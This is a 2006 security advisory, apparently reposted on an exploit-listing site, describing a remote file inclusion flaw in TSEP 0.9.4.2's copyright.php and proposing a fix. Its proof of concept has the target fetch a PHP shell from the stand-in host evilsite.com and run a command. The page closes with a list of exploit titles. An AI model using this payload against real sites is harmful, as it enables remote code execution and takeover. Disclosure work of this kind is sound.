exploits , vulnerabilities , articles , TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability

2006-08-02 TSEP <= 0.942 (colorswitch.php) Remote Inclusion Vulnerability

2006-08-01

TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability

Rated as : Moderate Risk

+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Venedor ...........: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+ <?php require (
$tsep_config["absPath"]."/include/tsepversion.txt" );
?>
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized before being
used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in copyright.php
+
+--------------------------------------------------------------------
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+
http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+-------------------------[ E O F ]----------------------------------
securitydot.net - 2006-08-01

Exploits - newest 10 RSS | More

2007-06-15 57359 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34261 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42500 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29380 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19806 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16744 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19449 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16632 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33653 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17265 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit